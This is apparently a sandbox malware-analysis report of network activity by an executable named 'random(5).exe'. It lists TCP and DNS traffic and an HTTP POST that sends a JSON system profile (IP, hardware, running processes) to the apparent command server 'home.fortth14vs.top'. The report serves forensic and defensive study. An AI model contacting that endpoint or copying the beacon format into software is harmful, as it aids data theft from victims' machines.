                                                  Jan 2, 2025 09:15:09.801120996 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.801181078 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.805088997 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805154085 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.805166960 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805210114 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.805222988 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805269957 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.805282116 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805320024 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805322886 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.805345058 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805427074 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805434942 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805479050 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805542946 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805583954 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805643082 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805650949 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805668116 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805675030 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805692911 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805701017 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805754900 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805763960 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805819988 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805829048 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805845022 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805852890 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805942059 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.805960894 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806036949 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.806063890 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806073904 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806090117 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806092024 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.806114912 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806122065 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.806160927 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.806175947 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806185007 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806216955 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806226015 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806236029 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.806282043 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806292057 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806319952 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806329966 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806401968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806408882 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806448936 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806457043 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806463003 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806468010 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806483030 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806492090 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806513071 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806521893 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806550980 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806559086 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806605101 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806612968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806657076 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806665897 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806677103 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806684971 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806708097 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806718111 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806744099 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806751966 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806776047 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806783915 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806847095 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806854963 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806862116 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806869984 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806936979 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806946039 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.806948900 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.809899092 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810035944 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810044050 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810081959 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810090065 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810137033 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810151100 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810159922 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810894012 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.810904980 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811068058 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811078072 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811103106 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811110020 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811196089 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811203957 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811249018 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811258078 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811268091 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811300993 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811357021 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811366081 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811433077 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811443090 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811461926 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811470985 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811484098 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.811506987 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811522007 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811553001 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.811562061 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811569929 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811604023 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811614990 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811626911 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811638117 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811672926 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811681032 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811723948 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811732054 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811738968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811748028 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811773062 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811781883 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811799049 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811808109 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811863899 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811873913 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811889887 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811903000 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811919928 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811928034 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811952114 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811959982 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811990023 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.811999083 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812022924 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812037945 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812067986 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812076092 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812129974 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812139034 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.812174082 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816306114 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816411018 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816418886 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816478968 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816488028 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816504002 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816513062 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816566944 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816575050 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816626072 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816634893 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816723108 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816730022 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816736937 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816741943 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:09.816746950 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816777945 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816787958 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816843033 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816853046 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816905975 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816916943 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816988945 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.816997051 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817051888 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817060947 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817075014 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817082882 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817167044 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817174911 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817179918 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817198992 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817246914 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817255020 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817365885 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817373991 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817411900 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817420006 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817462921 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817471981 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817536116 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817544937 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817548037 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817558050 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817569017 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817593098 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817601919 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817610979 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817627907 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817636967 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817665100 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817675114 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817711115 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.817720890 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821599007 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821608067 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821625948 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821635962 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821690083 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821698904 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821758032 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821768045 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821813107 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821821928 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821875095 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821883917 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821902037 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821911097 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821924925 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.821964979 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822092056 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822101116 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822103977 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822108030 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822128057 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822137117 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822189093 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822199106 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822216988 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822225094 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822274923 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822283983 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822309971 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822328091 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822393894 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822402954 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822449923 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822485924 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822501898 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822511911 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822570086 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822578907 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822633028 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:09.822643042 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:12.459002018 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:12.459366083 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:12.464494944 CET804971134.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:12.464576006 CET4971180192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:12.806647062 CET4971880192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:12.811566114 CET804971834.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:12.811686993 CET4971880192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:12.811916113 CET4971880192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:12.816752911 CET804971834.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:13.419538021 CET804971834.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:13.420104027 CET4971880192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:13.425082922 CET804971834.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:13.425384998 CET4971880192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:14.289203882 CET4973080192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:14.294045925 CET804973034.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:14.294116020 CET4973080192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:14.294465065 CET4973080192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:14.299257994 CET804973034.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:14.996077061 CET804973034.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:14.996550083 CET4973080192.168.2.634.147.147.173
                                                  Jan 2, 2025 09:15:15.001912117 CET804973034.147.147.173192.168.2.6
                                                  Jan 2, 2025 09:15:15.001979113 CET4973080192.168.2.634.147.147.173

                                                  UDP Packets

                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 2, 2025 09:15:06.867830992 CET6383753192.168.2.61.1.1.1
                                                  Jan 2, 2025 09:15:06.867892027 CET6383753192.168.2.61.1.1.1
                                                  Jan 2, 2025 09:15:06.874754906 CET53638371.1.1.1192.168.2.6
                                                  Jan 2, 2025 09:15:06.875184059 CET53638371.1.1.1192.168.2.6
                                                  Jan 2, 2025 09:15:08.603240013 CET6384053192.168.2.61.1.1.1
                                                  Jan 2, 2025 09:15:08.603332996 CET6384053192.168.2.61.1.1.1
                                                  Jan 2, 2025 09:15:08.884521961 CET53638401.1.1.1192.168.2.6
                                                  Jan 2, 2025 09:15:09.355252981 CET53638401.1.1.1192.168.2.6
                                                  Jan 2, 2025 09:15:12.518076897 CET5279453192.168.2.61.1.1.1
                                                  Jan 2, 2025 09:15:12.518140078 CET5279453192.168.2.61.1.1.1
                                                  Jan 2, 2025 09:15:12.525157928 CET53527941.1.1.1192.168.2.6
                                                  Jan 2, 2025 09:15:12.805670023 CET53527941.1.1.1192.168.2.6
                                                  Jan 2, 2025 09:15:13.478763103 CET5279653192.168.2.61.1.1.1
                                                  Jan 2, 2025 09:15:13.478825092 CET5279653192.168.2.61.1.1.1
                                                  Jan 2, 2025 09:15:14.144407034 CET53527961.1.1.1192.168.2.6
                                                  Jan 2, 2025 09:15:14.285022020 CET53527961.1.1.1192.168.2.6

                                                  DNS Queries

                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                  Jan 2, 2025 09:15:06.867830992 CET192.168.2.61.1.1.10x228dStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 09:15:06.867892027 CET192.168.2.61.1.1.10xa97eStandard query (0)httpbin.org28IN (0x0001)false
                                                  Jan 2, 2025 09:15:08.603240013 CET192.168.2.61.1.1.10x5b23Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 09:15:08.603332996 CET192.168.2.61.1.1.10x9f6bStandard query (0)home.fortth14vs.top28IN (0x0001)false
                                                  Jan 2, 2025 09:15:12.518076897 CET192.168.2.61.1.1.10xebeaStandard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 09:15:12.518140078 CET192.168.2.61.1.1.10x32b3Standard query (0)home.fortth14vs.top28IN (0x0001)false
                                                  Jan 2, 2025 09:15:13.478763103 CET192.168.2.61.1.1.10xb973Standard query (0)home.fortth14vs.topA (IP address)IN (0x0001)false
                                                  Jan 2, 2025 09:15:13.478825092 CET192.168.2.61.1.1.10x332aStandard query (0)home.fortth14vs.top28IN (0x0001)false

                                                  DNS Answers

                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                  Jan 2, 2025 09:15:06.875184059 CET1.1.1.1192.168.2.60x228dNo error (0)httpbin.org34.200.57.114A (IP address)IN (0x0001)false
                                                  Jan 2, 2025 09:15:06.875184059 CET1.1.1.1192.168.2.60x228dNo error (0)httpbin.org34.197.122.172A (IP address)IN (0x0001)false
                                                  Jan 2, 2025 09:15:08.884521961 CET1.1.1.1192.168.2.60x5b23No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                                  Jan 2, 2025 09:15:12.525157928 CET1.1.1.1192.168.2.60xebeaNo error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false
                                                  Jan 2, 2025 09:15:14.144407034 CET1.1.1.1192.168.2.60xb973No error (0)home.fortth14vs.top34.147.147.173A (IP address)IN (0x0001)false

                                                  HTTP Request Dependency Graph

                                                  • httpbin.org
                                                  • home.fortth14vs.top

                                                  HTTP Packets

                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                  0192.168.2.64971134.147.147.173805792C:\Users\user\Desktop\random(5).exe
                                                  TimestampBytes transferredDirectionData
                                                  Jan 2, 2025 09:15:09.366978884 CET12360OUTPOST /gduZhxVRrNSTmMahdBGb1735537738 HTTP/1.1
                                                  Host: home.fortth14vs.top
                                                  Accept: */*
                                                  Content-Type: application/json
                                                  Content-Length: 442005
                                                  Data Raw: 7b 20 22 69 70 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 2c 20 22 63 75 72 72 65 6e 74 5f 74 69 6d 65 22 3a 20 22 38 34 35 32 31 33 32 31 34 30 30 30 31 36 37 36 30 34 33 22 2c 20 22 4e 75 6d 5f 70 72 6f 63 65 73 73 6f 72 22 3a 20 34 2c 20 22 4e 75 6d 5f 72 61 6d 22 3a 20 37 2c 20 22 64 72 69 76 65 72 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 43 3a 5c 5c 22 2c 20 22 61 6c 6c 22 3a 20 32 32 33 2e 30 2c 20 22 66 72 65 65 22 3a 20 31 36 38 2e 30 20 7d 20 5d 2c 20 22 4e 75 6d 5f 64 69 73 70 6c 61 79 73 22 3a 20 31 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 78 22 3a 20 31 32 38 30 2c 20 22 72 65 73 6f 6c 75 74 69 6f 6e 5f 79 22 3a 20 31 30 32 34 2c 20 22 72 65 63 65 6e 74 5f 66 69 6c 65 73 22 3a 20 32 36 2c 20 22 70 72 6f 63 65 73 73 65 73 22 3a 20 5b 20 7b 20 22 6e 61 6d 65 22 3a 20 22 5b 53 79 73 74 65 6d 20 50 72 6f 63 65 73 73 5d 22 2c 20 22 70 69 64 22 3a 20 30 20 7d 2c 20 7b 20 22 6e 61 6d 65 22 3a 20 22 53 79 73 74 65 6d 22 2c 20 22 70 69 64 22 3a 20 34 20 7d 2c 20 7b 20 22 6e 61 [TRUNCATED]
                                                  Data Ascii: { "ip": "8.46.123.189", "current_time": "8452132140001676043", "Num_processor": 4, "Num_ram": 7, "drivers": [ { "name": "C:\\", "all": 223.0, "free": 168.0 } ], "Num_displays": 1, "resolution_x": 1280, "resolution_y": 1024, "recent_files": 26, "processes": [ { "name": "[System Process]", "pid": 0 }, { "name": "System", "pid": 4 }, { "name": "Registry", "pid": 92 }, { "name": "smss.exe", "pid": 328 }, { "name": "csrss.exe", "pid": 412 }, { "name": "wininit.exe", "pid": 488 }, { "name": "csrss.exe", "pid": 496 }, { "name": "winlogon.exe", "pid": 560 }, { "name": "services.exe", "pid": 632 }, { "name": "lsass.exe", "pid": 652 }, { "name": "svchost.exe", "pid": 752 }, { "name": "fontdrvhost.exe", "pid": 780 }, { "name": "fontdrvhost.exe", "pid": 788 }, { "name": "svchost.exe", "pid": 868 }, { "name": "svchost.exe", "pid": 928 }, { "name": "dwm.exe", "pid": 996 }, { "name": "svchost.exe", "pid": 436 }, { "name": "svchost.exe", "pid": 376 }, { "name": "svchost.exe", "pid": 60 }, { "name": "svchost.exe", [TRUNCATED]
                                                  Jan 2, 2025 09:15:09.371915102 CET4944OUTData Raw: 7a 47 5c 2f 61 50 42 58 36 56 33 67 44 39 49 6a 4d 73 36 79 66 77 64 34 39 5c 2f 31 77 7a 48 68 33 41 34 66 4d 38 34 77 33 2b 71 5c 2f 47 6e 44 5c 2f 31 50 41 34 72 45 50 43 30 4b 5c 2f 74 65 4b 4f 48 63 6b 6f 59 6a 6e 72 70 30 5c 2f 5a 34 57 70
